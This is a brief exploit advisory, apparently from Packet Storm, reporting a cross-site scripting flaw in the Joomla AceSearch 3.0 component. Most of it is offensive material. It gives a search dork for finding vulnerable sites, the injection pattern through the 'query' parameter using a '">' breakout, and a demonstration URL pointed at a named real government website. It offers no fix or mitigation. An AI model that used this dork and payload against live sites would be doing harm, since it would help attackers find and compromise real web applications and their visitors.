Joomla AceSearch component version 3.0 suffers from a cross site scripting vulnerability.
e7a05ee0db5238182077cb146d0bce90318ec17be3495461f1abfbfc7421e6d8
#Title : Joomla Component AceSearch Cross Site Scripting
#Author : DevilScreaM
#Date : 5 January 2014
#Category : Web Applications
#Product : http://www.joomace.net/joomla-extensions/acesearch/
#Version : 3.0
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Cross Site Scripting
#Dork : inurl:component/acesearch/
Cross Site Scripting
http://site-target/component/acesearch/search?query=”>[XSS]
Use “> for Bypass Cross Site Scripting
Example :
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed